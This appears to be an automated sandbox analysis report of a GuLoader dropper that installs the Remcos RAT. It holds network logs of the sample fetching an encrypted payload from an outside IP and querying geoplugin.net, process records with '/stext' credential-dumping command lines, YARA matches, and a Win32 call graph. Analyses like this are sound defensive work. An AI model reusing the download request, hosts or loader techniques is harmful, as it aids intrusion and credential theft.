0 | 192.168.2.8 | 49709 | 212.162.149.38 | 80 | 8112 | C:\Users\user\Desktop\orders_PI 008-01.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:27:31.139986992 CET | 177 | OUT | GET /LnGWkyvzVtM166.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Host: 212.162.149.38
                                      Cache-Control: no-cache
Nov 4, 2024 09:27:31.787652969 CET | 1236 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Mon, 04 Nov 2024 04:14:51 GMT
                                      Accept-Ranges: bytes
                                      ETag: "bccd2918702edb1:0"
                                      Server: Microsoft-IIS/8.5
                                      Date: Mon, 04 Nov 2024 08:27:31 GMT
                                      Content-Length: 494656
                                      Data Raw: 98 9b 18 1b 4e 6a 3b b7 f2 2d 46 e6 f7 30 86 df 65 0b fc 39 d4 e0 e5 3d 8b 34 d3 dc eb af a2 00 d9 da bd fe b7 bd 08 74 a5 b2 c4 6b 61 e8 43 30 ed 4c c6 05 d3 35 a4 4b 16 37 46 26 e3 c2 cb e0 fa 4d c6 12 0a ad 58 3d de 85 33 6c 3d a3 43 95 31 c7 b2 87 6f 1c 25 8c 13 b5 98 c8 3d bf 9c ab 24 28 64 5e de ac e1 77 da 0a f3 e2 cf 78 f2 41 25 2b 93 5d c7 a8 7d d5 95 20 30 17 24 43 96 ae 20 4e cb 4a a7 e2 2d 02 84 e3 96 39 c6 23 3e 9e 93 bd 28 f0 09 2c e5 ca de 3d 9d 1d 92 c2 18 1e f2 70 77 d0 d4 c6 ed 49 b0 8e 38 f4 44 db c6 b0 bc a7 59 c7 97 e3 23 a5 e7 2e b4 9d 54 73 44 ab 26 a1 f0 02 2d af 8d 70 dc ff 32 43 f6 9b 19 a6 2a 4c 82 fe 03 5a 29 c9 7b 6c cb 9b d1 18 1f 7f cf 55 d7 91 92 fb 9b 21 5a b2 59 af 6f 1d c9 f1 46 e2 f0 c5 28 13 e9 e9 c6 a3 55 bb 72 71 34 9f 62 fa 05 fa 47 7b 4c 28 ef a9 0c 1a 97 a2 9a 4d fe 5b 7f 1f 07 6f cc 2d 9f 66 5d 1b 02 c7 ce 74 3e bf 6b d8 c2 8a b3 fd 9f ec 53 3a b1 d6 2b 07 60 27 e1 90 c4 c4 8e 95 69 cc db 73 8c 28 c7 8e 18 fc 37 ec bc 7c 13 2d e9 43 a0 34 75 3d 83 be 0e dc [TRUNCATED]
                                      Data Ascii: Nj;-F0e9=4tkaC0L5K7F&MX=3l=C1o%=$(d^wxA%+]} 0$C NJ-9#>(,=pwI8DY#.TsD&-p2C*LZ){lU!ZYoF(Urq4bG{L(M[o-f]t>kS:+`'is(7|-C4u=kdH|zgqYFu!#^"=JWa&A%Qyfx\ey/_=-Vz.9Y{$;pH_V(H81Qt7yoK@'Mh#Xr%2W6_3<~8\?Ua?~6u5EzD4:/j$q0[J(mMXi1kXlQj3J~}_L;q,8W8Imes0o05&Us|x_NWipCt^_JA?M0hzHhiPkLNKT/NK;qbytq)?u-x=">rXgXG2X@Ed6*6$hX )<Hi@fAm/%BGi>'I'6OLf2NADaCISZl1p$|e0'L)&yLC;55,;-uz7$|/idG,xS^^{*AX5:<{S"'/l{N!
Nov 4, 2024 09:27:31.787672043 CET | 1236 | IN | Data Raw: cb ad 30 07 25 0d 63 ee 10 9c cf f4 14 24 10 50 73 8e bc ba ec 12 c0 19 82 e9 8d d5 45 a4 f0 b5 4c d3 c1 5a 2b be 53 e5 71 00 16 c1 16 4e fb 9d 7e 23 dc fb f2 92 94 25 80 26 9d 1a ee 03 c2 27 1d b4 8e 62 9d f9 18 43 09 71 7a 4e e7 3c 4c d1 13 77
                                      Data Ascii: 0%c$PsELZ+SqN~#%&'bCqzN<LwxyCn$o36ZVs'+Tm}Z)1zu3LxHfFm,jp&D]y"wG3~T16w[rn1JDfCr.
Nov 4, 2024 09:27:31.787682056 CET | 1236 | IN | Data Raw: c1 aa fb 53 0d f3 33 15 c1 4f 8d 42 e5 27 64 dc 13 a6 9e 94 25 e8 83 1c 5f ee eb ae 14 1e b4 d7 a1 f7 f9 a1 d3 50 36 7a a6 b3 0e 4c d1 7b d8 14 48 c2 90 43 4a 40 81 de 5e 06 cc 1f 8f a0 24 63 16 f0 c9 ee 06 f6 e8 89 ad 59 ef f1 a1 4d 36 7e fe e8
                                      Data Ascii: S3OB'd%_P6zL{HCJ@^$cYM6~_R)}d|XZU-_o1O(b<PT<w8YjRX*|5GHHQ8F?.\2Xr)i$Q"jo>fm+oI<%Uo"6E
Nov 4, 2024 09:27:31.787714958 CET | 1236 | IN | Data Raw: 18 43 50 fa aa c3 6b 18 d0 d1 13 77 7d 4b d7 78 17 20 c8 51 0a 11 4a a4 d6 c9 a0 a4 95 cb b6 c9 48 98 e2 f7 80 89 6d f8 cf 74 df 73 27 d6 64 2a 12 ff 1c fa 5c 10 b2 ef 4c d0 1b 78 5e 65 e8 77 5f 00 8c d3 16 f1 9a 97 bf f7 e5 b1 a2 c6 c5 be e4 48
                                      Data Ascii: CPkw}Kx QJHmts'd*\Lx^ew_H:KLxnGB<.vjW7] Sw:Z5,3;-t3[r1"bMlypjHI5&Hpp2 H/m=%<KS$%26w`
Nov 4, 2024 09:27:31.787725925 CET | 848 | IN | Data Raw: ac e6 ea 09 47 1b b7 b5 73 f3 19 90 b3 0e 8e 3c 36 8c 43 b2 b8 ea 8d a1 f5 9f 05 e0 8b 8d 40 01 97 6b 95 47 8c 64 35 67 f8 29 8a e1 27 f9 93 42 f1 f3 7e c5 5f fa a7 3a 19 94 3b c9 94 55 e2 ee 62 0b f4 e5 41 20 ed ad 19 dd 30 7a 13 82 a1 e1 cc a3
                                      Data Ascii: Gs<6C@kGd5g)'B~_:;UbA 0z{V08Gz40-WCv2[r+1n=pB.g]Mg?a+K^`X=^C"><Y6$(djv%_ NAbprD<$v
Nov 4, 2024 09:27:31.799107075 CET | 1236 | IN | Data Raw: 29 8e 8c ff 1c 48 f9 0f ec 77 b6 56 80 48 3a 65 31 26 6a a7 95 3e 93 b8 97 47 5d 67 0e 7a ed 32 eb c5 85 00 6c 31 66 5d e0 fd 62 6b 05 c8 6b fa a8 81 e6 ed 35 65 8d f5 22 ee 92 28 d5 dc fa 95 d1 30 eb 63 d4 c1 b2 b7 96 bf 50 33 55 93 43 07 85 55
                                      Data Ascii: )HwVH:e1&j>G]gz2l1f]bkk5e"(0cP3UCUtTJJT4N!dFKAgDSQjOKRRd"cf<Z\?D;<Ael#(;+#YUy/dMO,:<}M<{_/#=}>(g
Nov 4, 2024 09:27:31.799146891 CET | 1236 | IN | Data Raw: 12 10 da 02 51 e6 52 9e 1c c9 a7 e5 34 f8 5a d7 9f c9 13 89 39 24 e1 24 c7 f9 70 53 41 ac 54 2d ea 87 c1 cc 4a 69 40 80 9c ed 87 94 4c af 23 8b ae 8c 37 99 c1 b6 2b 1c 59 ec d2 42 07 42 03 5d a8 77 34 7a f3 36 05 aa 1f c0 8e 25 fd cd 3c 9b 54 12
                                      Data Ascii: QR4Z9$$pSAT-Ji@L#7+YBB]w4z6%<T{hx-!wJp@37Esaq<NOS ]@3{gkh5leVn(5Q7i$dkZH:j5j<2(jIV2&p"63%cL4x-R9NbM
Nov 4, 2024 09:27:31.799159050 CET | 424 | IN | Data Raw: d7 7a e2 8f 33 af 9a be 35 9a 6d a6 ce c1 c9 17 63 2a 3d ed e3 d8 7e c1 f9 8f 3e 27 49 d4 db 53 8e d3 40 14 21 dc 60 a7 25 67 aa 7a 4b c9 55 9b 35 da 18 74 51 cf 83 0b 0e bd 52 f8 d1 a3 08 76 4c 69 03 82 14 e6 69 1e 31 0a f9 ad c8 0d 31 99 cf 4e
                                      Data Ascii: z35mc*=~>'IS@!`%gzKU5tQRvLii11N.j!Yc<AAFPPeU/*M6$#D,|>\!R^ZMZqI7&'4K`_ED;IT@bB=nRJ)C.Sn:r-nkki~g'
Nov 4, 2024 09:27:31.799231052 CET | 1236 | IN | Data Raw: 05 94 69 92 33 ae 5f 1a 11 fd d1 0e 65 4a e5 6c fa 3f 30 08 3d 3e c1 84 4e 3c 62 5e f9 3b 26 97 d5 72 7f cc 93 49 5c ca d0 6d 4c 7a 56 86 97 e3 bf 81 72 dd 24 3e bf 9c ab d3 5d 88 65 16 da f1 fc 19 21 32 69 9a 9c c9 91 a8 1f 82 2b c5 23 8e 56 f0
                                      Data Ascii: i3_eJl?0=>N<b^;&rI\mLzVr$>]e!2i+#V0zC%XMku/y{Ovz~?x(+]x=0hTsHDO~Ctxo8R6t;^.XIejHVveW^
Nov 4, 2024 09:27:31.799243927 CET | 1236 | IN | Data Raw: be 21 d2 b4 a2 94 89 c7 36 47 1b 37 a8 c9 5b e5 15 85 31 57 43 aa 24 28 34 d3 9b 50 6a b9 8a e2 bc 13 30 87 a2 cc 68 23 7b 97 c6 a8 7d 85 1e ee d8 96 c6 bd 69 45 11 dc 34 54 f7 db 69 db 4d 9a 96 75 0b 52 e7 bb ea 26 b5 81 7b 43 d2 35 fa 58 ed f3
                                      Data Ascii: !6G7[1WC$(4Pj0h#{}iE4TiMuR&{C5XPyd^kj\5J0.zurDW~MGZ@uJ&;;/RX?;TOe~P)09eV(WT.Ho5kVvw1rX;.v
Nov 4, 2024 09:27:31.799257040 CET | 1236 | IN | Data Raw: 2d 79 8f cd 53 62 a2 38 2c bd a1 b6 73 67 9c f2 aa 39 45 d1 ae fa 10 83 4a af c5 28 5f df 25 e3 2a b5 09 05 4d cc 8c f0 8d d7 50 7d a1 42 81 ae 27 b0 2a d9 0e d7 bd f4 3f 56 cf 6f 16 a9 2b cc c1 1e fc f5 c4 6b f5 32 1f a5 e3 e7 3e e1 75 9b 82 bb
                                      Data Ascii: -ySb8,sg9EJ(_%*MP}B'*?Vo+k2>uTl7A~D]2M>n.<C!UmMOlOo=zTS4mAW,b#?ixQrW!s$]o5dC6)ZtHOn5NTnIAze5u+^


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49712 | 178.237.33.50 | 80 | 8112 | C:\Users\user\Desktop\orders_PI 008-01.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 09:27:36.958673000 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                      Host: geoplugin.net
                                      Cache-Control: no-cache
Nov 4, 2024 09:27:37.819782019 CET | 1165 | IN | HTTP/1.1 200 OK
                                      date: Mon, 04 Nov 2024 08:27:37 GMT
                                      server: Apache
                                      content-length: 957
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                      Data Ascii: { "geoplugin_request":"173.254.250.69", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



Target ID: 0
Start time: 03:27:03
Start date: 04/11/2024
Path: C:\Users\user\Desktop\orders_PI 008-01.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\orders_PI 008-01.exe"
Imagebase: 0x400000
File size: 906'904 bytes
MD5 hash: 5009D8C72623D30CE09149187C66D37C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 03:27:26
Start date: 04/11/2024
Path: C:\Users\user\Desktop\orders_PI 008-01.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\orders_PI 008-01.exe"
Imagebase: 0x400000
File size: 906'904 bytes
MD5 hash: 5009D8C72623D30CE09149187C66D37C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 5
Start time: 03:27:38
Start date: 04/11/2024
Path: C:\Users\user\Desktop\orders_PI 008-01.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"
Imagebase: 0x400000
File size: 906'904 bytes
MD5 hash: 5009D8C72623D30CE09149187C66D37C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 6
Start time: 03:27:38
Start date: 04/11/2024
Path: C:\Users\user\Desktop\orders_PI 008-01.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"
Imagebase: 0x400000
File size: 906'904 bytes
MD5 hash: 5009D8C72623D30CE09149187C66D37C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 7
Start time: 03:27:38
Start date: 04/11/2024
Path: C:\Users\user\Desktop\orders_PI 008-01.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"
Imagebase: 0x400000
File size: 906'904 bytes
MD5 hash: 5009D8C72623D30CE09149187C66D37C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 20%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.9%
Total number of Nodes: 704
Total number of Limit Nodes: 16
execution_graph: [node and edge data of the interactive call graph (node addresses such as 4034a2, 403015 and 6ff416d4, the Win32 APIs called at each, e.g. SetErrorMode, GetVersion, GetTempPathW, CreateProcessW, MoveFileExW, ExitWindowsEx, and the edges between them); the raw listing is not reproduced here]
3031 4060d5 3030->3031 3049 405ee4 GetFileAttributesW CreateFileW 3031->3049 3033 4060e2 3033->3026 3034 4060f1 GetFileSize GlobalAlloc 3033->3034 3035 406113 3034->3035 3036 4061a8 CloseHandle 3034->3036 3037 405f67 ReadFile 3035->3037 3036->3026 3038 40611b 3037->3038 3038->3036 3050 405e49 lstrlenA 3038->3050 3041 406132 lstrcpyA 3044 406154 3041->3044 3042 406146 3043 405e49 4 API calls 3042->3043 3043->3044 3045 40618b SetFilePointer 3044->3045 3046 405f96 WriteFile 3045->3046 3047 4061a1 GlobalFree 3046->3047 3047->3036 3048->3027 3049->3033 3051 405e8a lstrlenA 3050->3051 3052 405e92 3051->3052 3053 405e63 lstrcmpiA 3051->3053 3052->3041 3052->3042 3053->3052 3054 405e81 CharNextA 3053->3054 3054->3051 3055->2870 3057 405d8b 3056->3057 3059 405d9d 3056->3059 3057->3059 3060 405d98 CharNextW 3057->3060 3058 405dc1 3058->2873 3058->2874 3059->3058 3061 405cf0 CharNextW 3059->3061 3060->3058 3061->3059 3063 406762 FindClose 3062->3063 3064 40676d 3062->3064 3063->3064 3064->2880 3066 403a36 3065->3066 3067 403a00 3066->3067 3068 403a3b FreeLibrary GlobalFree 3066->3068 3069 405b00 3067->3069 3068->3067 3068->3068 3070 405dcb 18 API calls 3069->3070 3071 405b20 3070->3071 3072 405b28 DeleteFileW 3071->3072 3073 405b3f 3071->3073 3074 403816 OleUninitialize 3072->3074 3075 405c5f 3073->3075 3108 4063ee lstrcpynW 3073->3108 3074->2677 3074->2678 3075->3074 3081 40674c 2 API calls 3075->3081 3077 405b65 3078 405b78 3077->3078 3079 405b6b lstrcatW 3077->3079 3080 405d0f 2 API calls 3078->3080 3082 405b7e 3079->3082 3080->3082 3084 405c84 3081->3084 3083 405b8e lstrcatW 3082->3083 3085 405b99 lstrlenW FindFirstFileW 3082->3085 3083->3085 3084->3074 3086 405c88 3084->3086 3085->3075 3093 405bbb 3085->3093 3087 405cc3 3 API calls 3086->3087 3088 405c8e 3087->3088 3090 405ab8 5 API calls 3088->3090 3089 405c42 FindNextFileW 3089->3093 3094 405c58 FindClose 3089->3094 3092 405c9a 3090->3092 3095 405cb4 3092->3095 3096 405c9e 3092->3096 3093->3089 3100 405b00 60 API calls 
3093->3100 3102 405c0c 3093->3102 3109 4063ee lstrcpynW 3093->3109 3094->3075 3098 405456 24 API calls 3095->3098 3096->3074 3099 405456 24 API calls 3096->3099 3098->3074 3101 405cab 3099->3101 3100->3102 3104 4061b4 36 API calls 3101->3104 3102->3089 3103 405456 24 API calls 3102->3103 3106 405456 24 API calls 3102->3106 3107 4061b4 36 API calls 3102->3107 3110 405ab8 3102->3110 3103->3089 3105 405cb2 3104->3105 3105->3074 3106->3102 3107->3102 3108->3077 3109->3093 3118 405ebf GetFileAttributesW 3110->3118 3113 405ad3 RemoveDirectoryW 3116 405ae1 3113->3116 3114 405adb DeleteFileW 3114->3116 3115 405ae5 3115->3102 3116->3115 3117 405af1 SetFileAttributesW 3116->3117 3117->3115 3119 405ed1 SetFileAttributesW 3118->3119 3120 405ac4 3118->3120 3119->3120 3120->3113 3120->3114 3120->3115 3121 6ff41777 3122 6ff417aa 3121->3122 3163 6ff41b5f 3122->3163 3124 6ff417b1 3125 6ff418d6 3124->3125 3126 6ff417c2 3124->3126 3127 6ff417c9 3124->3127 3213 6ff4239e 3126->3213 3197 6ff423e0 3127->3197 3132 6ff4182d 3138 6ff41833 3132->3138 3139 6ff4187e 3132->3139 3133 6ff4180f 3226 6ff425b5 3133->3226 3134 6ff417df 3137 6ff417e5 3134->3137 3143 6ff417f0 3134->3143 3135 6ff417f8 3148 6ff417ee 3135->3148 3223 6ff42d83 3135->3223 3137->3148 3207 6ff42af8 3137->3207 3245 6ff415c6 3138->3245 3141 6ff425b5 10 API calls 3139->3141 3146 6ff4186f 3141->3146 3142 6ff41815 3237 6ff415b4 3142->3237 3217 6ff42770 3143->3217 3162 6ff418c5 3146->3162 3251 6ff42578 3146->3251 3148->3132 3148->3133 3152 6ff417f6 3152->3148 3153 6ff425b5 10 API calls 3153->3146 3155 6ff418cf GlobalFree 3155->3125 3159 6ff418b1 3159->3162 3255 6ff4153d wsprintfW 3159->3255 3160 6ff418aa FreeLibrary 3160->3159 3162->3125 3162->3155 3258 6ff4121b GlobalAlloc 3163->3258 3165 6ff41b86 3259 6ff4121b GlobalAlloc 3165->3259 3167 6ff41dcb GlobalFree GlobalFree GlobalFree 3168 6ff41de8 3167->3168 3179 6ff41e32 3167->3179 3170 6ff421de 3168->3170 3178 6ff41dfd 3168->3178 3168->3179 3169 6ff41c86 GlobalAlloc 3190 6ff41b91 
3169->3190 3171 6ff42200 GetModuleHandleW 3170->3171 3170->3179 3172 6ff42226 3171->3172 3173 6ff42211 LoadLibraryW 3171->3173 3266 6ff4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3172->3266 3173->3172 3173->3179 3174 6ff41cd1 lstrcpyW 3177 6ff41cdb lstrcpyW 3174->3177 3175 6ff41cef GlobalFree 3175->3190 3177->3190 3178->3179 3262 6ff4122c 3178->3262 3179->3124 3180 6ff42278 3180->3179 3183 6ff42285 lstrlenW 3180->3183 3181 6ff42086 3265 6ff4121b GlobalAlloc 3181->3265 3267 6ff4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3183->3267 3185 6ff41fc7 GlobalFree 3185->3190 3186 6ff4210e 3186->3179 3194 6ff42176 lstrcpyW 3186->3194 3187 6ff42238 3187->3180 3195 6ff42262 GetProcAddress 3187->3195 3189 6ff41d2d 3189->3190 3260 6ff4158f GlobalSize GlobalAlloc 3189->3260 3190->3167 3190->3169 3190->3174 3190->3175 3190->3177 3190->3179 3190->3181 3190->3185 3190->3186 3190->3189 3192 6ff4122c 2 API calls 3190->3192 3191 6ff4229f 3191->3179 3192->3190 3194->3179 3195->3180 3196 6ff4208f 3196->3124 3199 6ff423f8 3197->3199 3198 6ff4122c GlobalAlloc lstrcpynW 3198->3199 3199->3198 3201 6ff42521 GlobalFree 3199->3201 3203 6ff424a0 GlobalAlloc WideCharToMultiByte 3199->3203 3204 6ff424cb GlobalAlloc CLSIDFromString 3199->3204 3206 6ff424ea 3199->3206 3269 6ff412ba 3199->3269 3201->3199 3202 6ff417cf 3201->3202 3202->3134 3202->3135 3202->3148 3203->3201 3204->3201 3206->3201 3273 6ff42704 3206->3273 3209 6ff42b0a 3207->3209 3208 6ff42baf VirtualAlloc 3212 6ff42bcd 3208->3212 3209->3208 3211 6ff42c99 3211->3148 3276 6ff42aa2 3212->3276 3214 6ff423b3 3213->3214 3215 6ff423be GlobalAlloc 3214->3215 3216 6ff417c8 3214->3216 3215->3214 3216->3127 3221 6ff427a0 3217->3221 3218 6ff4284e 3220 6ff42854 GlobalSize 3218->3220 3222 6ff4285e 3218->3222 3219 6ff4283b GlobalAlloc 3219->3222 3220->3222 3221->3218 3221->3219 3222->3152 3224 6ff42d8e 3223->3224 3225 6ff42dce GlobalFree 3224->3225 3280 6ff4121b GlobalAlloc 
3226->3280 3228 6ff42638 MultiByteToWideChar 3233 6ff425bf 3228->3233 3229 6ff4265a StringFromGUID2 3229->3233 3230 6ff4266b lstrcpynW 3230->3233 3231 6ff4267e wsprintfW 3231->3233 3232 6ff426a2 GlobalFree 3232->3233 3233->3228 3233->3229 3233->3230 3233->3231 3233->3232 3234 6ff426d7 GlobalFree 3233->3234 3235 6ff41272 2 API calls 3233->3235 3281 6ff412e1 3233->3281 3234->3142 3235->3233 3285 6ff4121b GlobalAlloc 3237->3285 3239 6ff415b9 3240 6ff415c6 2 API calls 3239->3240 3241 6ff415c3 3240->3241 3242 6ff41272 3241->3242 3243 6ff412b5 GlobalFree 3242->3243 3244 6ff4127b GlobalAlloc lstrcpynW 3242->3244 3243->3146 3244->3243 3246 6ff415d2 wsprintfW 3245->3246 3247 6ff415ff lstrcpyW 3245->3247 3250 6ff41618 3246->3250 3247->3250 3250->3153 3252 6ff41891 3251->3252 3253 6ff42586 3251->3253 3252->3159 3252->3160 3253->3252 3254 6ff425a2 GlobalFree 3253->3254 3254->3253 3256 6ff41272 2 API calls 3255->3256 3257 6ff4155e 3256->3257 3257->3162 3258->3165 3259->3190 3261 6ff415ad 3260->3261 3261->3189 3268 6ff4121b GlobalAlloc 3262->3268 3264 6ff4123b lstrcpynW 3264->3179 3265->3196 3266->3187 3267->3191 3268->3264 3270 6ff412c1 3269->3270 3271 6ff4122c 2 API calls 3270->3271 3272 6ff412df 3271->3272 3272->3199 3274 6ff42712 VirtualAlloc 3273->3274 3275 6ff42768 3273->3275 3274->3275 3275->3206 3277 6ff42aad 3276->3277 3278 6ff42ab2 GetLastError 3277->3278 3279 6ff42abd 3277->3279 3278->3279 3279->3211 3280->3233 3282 6ff4130c 3281->3282 3283 6ff412ea 3281->3283 3282->3233 3283->3282 3284 6ff412f0 lstrcpyW 3283->3284 3284->3282 3285->3239 3459 6ff4103d 3462 6ff4101b 3459->3462 3463 6ff41516 GlobalFree 3462->3463 3464 6ff41020 3463->3464 3465 6ff41024 3464->3465 3466 6ff41027 GlobalAlloc 3464->3466 3467 6ff4153d 3 API calls 3465->3467 3466->3465 3468 6ff4103b 3467->3468 3286 403e6b 3287 403e83 3286->3287 3288 403fbe 3286->3288 3287->3288 3291 403e8f 3287->3291 3289 40400f 3288->3289 3290 403fcf GetDlgItem GetDlgItem 3288->3290 3293 404069 3289->3293 3303 401389 2 API 
calls 3289->3303 3292 404344 18 API calls 3290->3292 3294 403e9a SetWindowPos 3291->3294 3295 403ead 3291->3295 3298 403ff9 SetClassLongW 3292->3298 3299 404390 SendMessageW 3293->3299 3319 403fb9 3293->3319 3294->3295 3296 403eb2 ShowWindow 3295->3296 3297 403eca 3295->3297 3296->3297 3300 403ed2 DestroyWindow 3297->3300 3301 403eec 3297->3301 3302 40140b 2 API calls 3298->3302 3313 40407b 3299->3313 3356 4042cd 3300->3356 3304 403ef1 SetWindowLongW 3301->3304 3305 403f02 3301->3305 3302->3289 3306 404041 3303->3306 3304->3319 3309 403fab 3305->3309 3310 403f0e GetDlgItem 3305->3310 3306->3293 3311 404045 SendMessageW 3306->3311 3307 40140b 2 API calls 3307->3313 3308 4042cf DestroyWindow EndDialog 3308->3356 3366 4043ab 3309->3366 3314 403f21 SendMessageW IsWindowEnabled 3310->3314 3315 403f3e 3310->3315 3311->3319 3312 4042fe ShowWindow 3312->3319 3313->3307 3313->3308 3317 40642b 17 API calls 3313->3317 3313->3319 3329 404344 18 API calls 3313->3329 3347 40420f DestroyWindow 3313->3347 3357 404344 3313->3357 3314->3315 3314->3319 3318 403f43 3315->3318 3320 403f4b 3315->3320 3322 403f92 SendMessageW 3315->3322 3323 403f5e 3315->3323 3317->3313 3363 40431d 3318->3363 3320->3318 3320->3322 3322->3309 3324 403f66 3323->3324 3325 403f7b 3323->3325 3327 40140b 2 API calls 3324->3327 3328 40140b 2 API calls 3325->3328 3326 403f79 3326->3309 3327->3318 3330 403f82 3328->3330 3329->3313 3330->3309 3330->3318 3332 4040f6 GetDlgItem 3333 404113 ShowWindow KiUserCallbackDispatcher 3332->3333 3334 40410b 3332->3334 3360 404366 KiUserCallbackDispatcher 3333->3360 3334->3333 3336 40413d EnableWindow 3341 404151 3336->3341 3337 404156 GetSystemMenu EnableMenuItem SendMessageW 3338 404186 SendMessageW 3337->3338 3337->3341 3338->3341 3340 403e4c 18 API calls 3340->3341 3341->3337 3341->3340 3361 404379 SendMessageW 3341->3361 3362 4063ee lstrcpynW 3341->3362 3343 4041b5 lstrlenW 3344 40642b 17 API calls 3343->3344 3345 4041cb SetWindowTextW 3344->3345 3346 401389 2 API calls 
3345->3346 3346->3313 3348 404229 CreateDialogParamW 3347->3348 3347->3356 3349 40425c 3348->3349 3348->3356 3350 404344 18 API calls 3349->3350 3351 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3350->3351 3352 401389 2 API calls 3351->3352 3353 4042ad 3352->3353 3353->3319 3354 4042b5 ShowWindow 3353->3354 3355 404390 SendMessageW 3354->3355 3355->3356 3356->3312 3356->3319 3358 40642b 17 API calls 3357->3358 3359 40434f SetDlgItemTextW 3358->3359 3359->3332 3360->3336 3361->3341 3362->3343 3364 404324 3363->3364 3365 40432a SendMessageW 3363->3365 3364->3365 3365->3326 3367 40446e 3366->3367 3368 4043c3 GetWindowLongW 3366->3368 3367->3319 3368->3367 3369 4043d8 3368->3369 3369->3367 3370 404405 GetSysColor 3369->3370 3371 404408 3369->3371 3370->3371 3372 404418 SetBkMode 3371->3372 3373 40440e SetTextColor 3371->3373 3374 404430 GetSysColor 3372->3374 3375 404436 3372->3375 3373->3372 3374->3375 3376 404447 3375->3376 3377 40443d SetBkColor 3375->3377 3376->3367 3378 404461 CreateBrushIndirect 3376->3378 3379 40445a DeleteObject 3376->3379 3377->3376 3378->3367 3379->3378 3380 6ff429df 3381 6ff42a2f 3380->3381 3382 6ff429ef VirtualProtect 3380->3382 3382->3381 3431 402f2b 3432 402f3d SetTimer 3431->3432 3435 402f56 